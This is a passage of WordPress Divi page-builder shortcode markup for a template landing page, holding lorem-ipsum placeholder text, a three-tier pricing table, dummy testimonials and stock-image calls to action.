sticky=\"on\" align=\"left\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n\r\n\r\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"20\" text_text_color=\"#262e32\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Text Title</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#5d666a\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"22px|||\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Lorem ipsum dolor sit amet, coner est adipiscing au elit. Aenean como ligula etla.</p>\r\n\r\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/032-2.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"left\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n\r\n\r\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"20\" text_text_color=\"#262e32\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Text Title</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#5d666a\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"22px|||\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Lorem ipsum dolor sit amet, coner est adipiscing au elit. Aenean como ligula etla.</p>\r\n\r\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"on\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\" custom_padding=\"||0px|\"][et_pb_column type=\"4_4\"][et_pb_divider admin_label=\"Divider\" color=\"#d7dce1\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"off\"]\r\n\r\n\r\n\r\n[/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"Section\" fullwidth=\"off\" specialty=\"off\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"120px||30px|\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\"][et_pb_column type=\"4_4\"][et_pb_slider admin_label=\"Testimonial Slider\" show_arrows=\"on\" show_pagination=\"off\" auto=\"off\" auto_ignore_hover=\"off\" parallax=\"off\" parallax_method=\"off\" remove_inner_shadow=\"on\" background_position=\"default\" background_size=\"contain\" hide_content_on_mobile=\"off\" hide_cta_on_mobile=\"off\" show_image_video_mobile=\"off\" header_text_color=\"#262e32\" body_text_color=\"#262e32\" custom_button=\"off\" button_letter_spacing=\"0\" button_use_icon=\"default\" button_icon_placement=\"right\" button_on_hover=\"on\" button_letter_spacing_hover=\"0\" custom_css_slide_description=\"font-weight: 400;\" custom_css_slide_title=\"font-weight: 300;\" header_font=\"Roboto||||\" header_font_size=\"36\" body_font=\"Roboto||||\" body_font_size=\"20\" body_line_height=\"1.2em\" top_padding=\"0px\" bottom_padding=\"0px\"]\r\n\r\n[et_pb_slide heading=\"I use Testimonial Generator often. Great job, I will definitely be ordering again! I\'m good to go.\" background_position=\"default\" background_size=\"default\" background_color=\"#ffffff\" use_bg_overlay=\"off\" use_text_overlay=\"off\" alignment=\"center\" background_layout=\"light\" allow_player_pause=\"off\" text_border_radius=\"3\" header_font_select=\"default\" header_font=\"||||\" body_font_select=\"default\" body_font=\"||||\" custom_button=\"off\" button_font_select=\"default\" button_font=\"||||\" button_use_icon=\"default\" button_icon_placement=\"right\" button_on_hover=\"on\" header_line_height=\"1.5em\" header_line_height_tablet=\"1.2em\" header_line_height_phone=\"1.2em\"]\r\n\r\n<p style=\"text-align: center\"><img class=\"alignnone size-full wp-image-4854 aligncenter\" style=\"margin-top: 40px;margin-bottom: 10px\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/05-2.png\" alt=\"05\" width=\"90\" height=\"90\">Rick F.</p>\r\n\r\n[/et_pb_slide][et_pb_slide heading=\"This is unbelievable. After using Testimonial Generator my business skyrocketed!\" background_position=\"default\" background_size=\"default\" background_color=\"#ffffff\" use_bg_overlay=\"off\" use_text_overlay=\"off\" alignment=\"center\" background_layout=\"light\" allow_player_pause=\"off\" text_border_radius=\"3\" header_font_select=\"default\" header_font=\"||||\" body_font_select=\"default\" body_font=\"||||\" custom_button=\"off\" button_font_select=\"default\" button_font=\"||||\" button_use_icon=\"default\" button_icon_placement=\"right\" button_on_hover=\"on\" header_line_height=\"1.5em\" header_line_height_tablet=\"1.2em\" header_line_height_phone=\"1.2em\"]\r\n\r\n<p style=\"text-align: center\"><img class=\"alignnone size-full wp-image-4859\" style=\"margin-top: 40px;margin-bottom: 10px\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/008.png\" alt=\"008\" width=\"90\" height=\"90\"><br> Mick A.</p>\r\n\r\n[/et_pb_slide]\r\n\r\n[/et_pb_slider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"Section\" fullwidth=\"off\" specialty=\"off\" transparent_background=\"off\" background_color=\"#f7f8fa\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" custom_css_main_element=\"border-top: 1px solid #D7DCE1;\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" custom_width_px=\"780px\" use_custom_gutter=\"off\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\" custom_padding=\"101px|||\"][et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Simple Pricing\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"56\" text_text_color=\"#262e32\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_line_height=\"1.2em\" custom_css_main_element=\"font-weight: 300;\"]\r\n\r\n<p>Simple pricing.</p>\r\n\r\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" background_color_1=\"#ffffff\" parallax_2=\"off\" parallax_method_2=\"off\" background_color_2=\"#ffffff\" parallax_3=\"off\" parallax_method_3=\"off\" background_color_3=\"#ffffff\" column_padding_mobile=\"on\" custom_css_main_1=\"border: 1px solid #D7DCE1\" custom_css_main_2=\"border: 1px solid #D7DCE1\" custom_css_main_3=\"border: 1px solid #D7DCE1\" custom_padding=\"60px|||\"][et_pb_column type=\"1_3\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#1ec4d6\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"58px|||\"]\r\n\r\n<p>Starter</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#5b666d\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"30px|||\" custom_css_main_element=\"font-weight:400;\" text_line_height=\"1.3em\"]\r\n\r\n<p>A beautiful simple<br /> lorem ipsum solution.</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"72\" text_text_color=\"#262e32\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"20px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.3em\"]\r\n\r\n<p>$8</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_text_color=\"#9fa9af\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"2px||38px|\" custom_css_main_element=\"font-weight:400;\" text_line_height=\"1.3em\"]\r\n\r\n<p>Per user/month</p>\r\n\r\n[/et_pb_text][et_pb_button admin_label=\"Button\" button_url=\"#\" url_new_window=\"off\" button_text=\"FREE TRIAL\" button_alignment=\"center\" background_layout=\"light\" custom_button=\"on\" button_text_size=\"15\" button_text_color=\"#9fa9af\" button_bg_color=\"#ffffff\" button_border_width=\"1\" button_border_color=\"#cfd4d7\" button_border_radius=\"4\" button_letter_spacing=\"1\" button_font=\"Roboto||||\" button_use_icon=\"off\" button_icon_placement=\"right\" button_on_hover=\"on\" button_border_color_hover=\"#30c2a2\" button_border_radius_hover=\"4\" button_letter_spacing_hover=\"1\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"#30c2a2\"]\r\n\r\n\r\n\r\n[/et_pb_button][et_pb_divider admin_label=\"Divider\" color=\"#ffffff\" show_divider=\"off\" height=\"38\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"on\"]\r\n\r\n\r\n\r\n[/et_pb_divider][/et_pb_column][et_pb_column type=\"1_3\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#7d75d9\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"58px|||\"]\r\n\r\n<p>Professional</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#5b666d\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"30px|||\" custom_css_main_element=\"font-weight:400;\" text_line_height=\"1.3em\"]\r\n\r\n<p>Perfect for lorem ipsum<br /> businesses of all size.</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"72\" text_text_color=\"#262e32\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"20px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.3em\"]\r\n\r\n<p>$18</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_text_color=\"#9fa9af\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"2px||38px|\" custom_css_main_element=\"font-weight:400;\" text_line_height=\"1.3em\"]\r\n\r\n<p>Per user/month</p>\r\n\r\n[/et_pb_text][et_pb_button admin_label=\"Button\" button_url=\"#\" url_new_window=\"off\" button_text=\"FREE TRIAL\" button_alignment=\"center\" background_layout=\"light\" custom_button=\"on\" button_text_size=\"15\" button_text_color=\"#9fa9af\" button_bg_color=\"#ffffff\" button_border_width=\"1\" button_border_color=\"#cfd4d7\" button_border_radius=\"4\" button_letter_spacing=\"1\" button_font=\"Roboto||||\" button_use_icon=\"off\" button_icon_placement=\"right\" button_on_hover=\"on\" button_border_color_hover=\"#30c2a2\" button_border_radius_hover=\"4\" button_letter_spacing_hover=\"1\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"#30c2a2\"]\r\n\r\n\r\n\r\n[/et_pb_button][et_pb_divider admin_label=\"Divider\" color=\"#ffffff\" show_divider=\"off\" height=\"38\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"on\"]\r\n\r\n\r\n\r\n[/et_pb_divider][/et_pb_column][et_pb_column type=\"1_3\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#3b67b3\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"58px|||\"]\r\n\r\n<p>Advanced</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#5b666d\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"30px|||\" custom_css_main_element=\"font-weight:400;\" text_line_height=\"1.3em\"]\r\n\r\n<p>Advanced features as<br /> your business grow.</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"72\" text_text_color=\"#262e32\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"20px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.3em\"]\r\n\r\n<p>$48</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_text_color=\"#9fa9af\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"2px||38px|\" custom_css_main_element=\"font-weight:400;\" text_line_height=\"1.3em\"]\r\n\r\n<p>Per user/month</p>\r\n\r\n[/et_pb_text][et_pb_button admin_label=\"Button\" button_url=\"#\" url_new_window=\"off\" button_text=\"FREE TRIAL\" button_alignment=\"center\" background_layout=\"light\" custom_button=\"on\" button_text_size=\"15\" button_text_color=\"#9fa9af\" button_bg_color=\"#ffffff\" button_border_width=\"1\" button_border_color=\"#cfd4d7\" button_border_radius=\"4\" button_letter_spacing=\"1\" button_font=\"Roboto||||\" button_use_icon=\"off\" button_icon_placement=\"right\" button_on_hover=\"on\" button_border_color_hover=\"#30c2a2\" button_border_radius_hover=\"4\" button_letter_spacing_hover=\"1\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"#30c2a2\"]\r\n\r\n\r\n\r\n[/et_pb_button][et_pb_divider admin_label=\"Divider\" color=\"#ffffff\" show_divider=\"off\" height=\"38\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"on\"]\r\n\r\n\r\n\r\n[/et_pb_divider][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"||103px|\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\"][et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"16\" text_text_color=\"#5b666d\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_css_main_element=\"font-weight:300;\"]\r\n\r\n<p>Notice: You can learn more about our <span style=\"text-decoration: underline\"><strong>Terms of Service</strong></span></p>\r\n\r\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"section\" transparent_background=\"off\" background_color=\"#212a35\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" disabled_on=\"on|on|on\" disabled=\"on\"][et_pb_row admin_label=\"row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" custom_width_px=\"500px\" use_custom_gutter=\"off\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" column_padding_mobile=\"on\" gutter_width=\"1\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" custom_padding=\"98px||90px|\" custom_padding_last_edited=\"on|desktop\" custom_padding_tablet=\"104px||60px|\"][et_pb_column type=\"4_4\"][et_pb_cta admin_label=\"Limited Offer\" title=\"Limited time offer. Get 10 free stock images.\" button_url=\"#\" url_new_window=\"off\" button_text=\"START NOW\" use_background_color=\"off\" background_color=\"#7EBEC5\" background_layout=\"dark\" text_orientation=\"center\" max_width=\"620px\" header_font=\"Roboto||||\" header_font_size=\"56\" header_font_size_last_edited=\"on|phone\" header_text_color=\"#ffffff\" header_line_height=\"1.3em\" body_font=\"Roboto||||\" body_font_size=\"20\" body_text_color=\"#00bcd4\" body_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_button=\"on\" button_text_color=\"#ffffff\" button_bg_color=\"#00bcd4\" button_border_width=\"8\" button_border_color=\"#00bcd4\" button_border_radius=\"4\" button_letter_spacing=\"1\" button_font=\"Roboto||||\" button_use_icon=\"off\" button_icon_placement=\"right\" button_on_hover=\"on\" button_border_color_hover=\"#00bcd4\" button_border_radius_hover=\"4\" button_letter_spacing_hover=\"1\" custom_css_promo_description=\"font-weight:400;\" custom_css_promo_button=\"margin-top:34px;\" button_text_size=\"15\" header_font_size_tablet=\"46\" header_font_size_phone=\"36\" custom_css_main_element=\"font-weight:400;\"]\r\n\r\n<p class=\"p1\">Yes, I’m a dummy text. Anyway I look nice and useful.</p>\r\n\r\n[/et_pb_cta][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"on\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" custom_padding=\"23px|||\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\"][et_pb_column type=\"4_4\"][et_pb_divider admin_label=\"Divider\" color=\"#37414d\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"off\"]\r\n\r\n\r\n\r\n[/et_pb_divider][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"4px||90px|\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" parallax_3=\"off\" parallax_method_3=\"off\" column_padding_mobile=\"on\"][et_pb_column type=\"1_3\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/042.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"left\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n\r\n\r\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#ffffff\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Find quick</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#818890\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"20px|||\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Lorem ipsum dolor sit amet, consecter adipiscing elit. Aenean commodo ligula eget dolor. Cum soclis orestem.</p>\r\n\r\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/04_02.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"left\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n\r\n\r\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#ffffff\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Jump start</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#818890\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"20px|||\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Lorem ipsum dolor sit amet, consecter adipiscing elit. Aenean commodo ligula eget dolor. Cum soclis orestem.</p>\r\n\r\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/04_03.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"left\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n\r\n\r\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#ffffff\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Make it amazing</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#818890\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"20px|||\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Lorem ipsum dolor sit amet, consecter adipiscing elit. Aenean commodo ligula eget dolor. Cum soclis orestem.</p>\r\n\r\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"section\" transparent_background=\"off\" background_color=\"#212a35\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" disabled_on=\"on|on|on\" disabled=\"on\"][et_pb_row admin_label=\"row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" custom_width_px=\"500px\" use_custom_gutter=\"off\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" column_padding_mobile=\"on\" gutter_width=\"1\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" custom_padding=\"98px||90px|\" custom_padding_last_edited=\"on|desktop\" custom_padding_tablet=\"104px||60px|\"][et_pb_column type=\"4_4\"][et_pb_cta admin_label=\"Collections\" title=\"Ask more of your stock images\" url_new_window=\"off\" use_background_color=\"off\" background_color=\"#7EBEC5\" background_layout=\"dark\" text_orientation=\"center\" max_width=\"520px\" header_font=\"Roboto||||\" header_font_size=\"56\" header_font_size_last_edited=\"on|phone\" header_text_color=\"#ffffff\" header_line_height=\"1.3em\" body_font=\"Roboto||||\" body_font_size=\"20\" body_text_color=\"#00bcd4\" body_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_button=\"on\" button_text_color=\"#ffffff\" button_bg_color=\"#00bcd4\" button_border_width=\"8\" button_border_color=\"#00bcd4\" button_border_radius=\"4\" button_letter_spacing=\"1\" button_font=\"Roboto||||\" button_use_icon=\"off\" button_icon_placement=\"right\" button_on_hover=\"on\" button_border_color_hover=\"#00bcd4\" button_border_radius_hover=\"4\" button_letter_spacing_hover=\"1\" custom_css_promo_description=\"font-weight:400;\" custom_css_promo_button=\"margin-top:34px;\" button_text_size=\"15\" header_font_size_tablet=\"46\" header_font_size_phone=\"36\" custom_css_main_element=\"font-weight:400;\"]\r\n\r\n<p class=\"p1\">Yes, I’m a dummy text. Anyway I look nice and useful.</p>\r\n\r\n[/et_pb_cta][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"0px||40px|\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" parallax_3=\"off\" parallax_method_3=\"off\" column_padding_mobile=\"on\" custom_padding_phone=\"0px|||\" custom_padding_last_edited=\"on|phone\"][et_pb_column type=\"1_3\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/01_thumb2.jpg\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"off\" sticky=\"off\" align=\"center\" force_fullwidth=\"on\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n\r\n\r\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#ffffff\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Find quick</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#818890\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"20px|||\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Lorem ipsum dolor sit amet, consecter adipiscing elit. Aenean commodo ligula eget dolor. Cum soclis orestem.</p>\r\n\r\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/02_thumb3.jpg\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"off\" sticky=\"off\" align=\"center\" force_fullwidth=\"on\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n\r\n\r\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#ffffff\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Jump start</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#818890\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"20px|||\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Lorem ipsum dolor sit amet, consecter adipiscing elit. Aenean commodo ligula eget dolor. Cum soclis orestem.</p>\r\n\r\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/03_thumb2.jpg\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"off\" sticky=\"off\" align=\"center\" force_fullwidth=\"on\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n\r\n\r\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#ffffff\" text_line_height=\"1.2em\" use_border_color=\"off\" 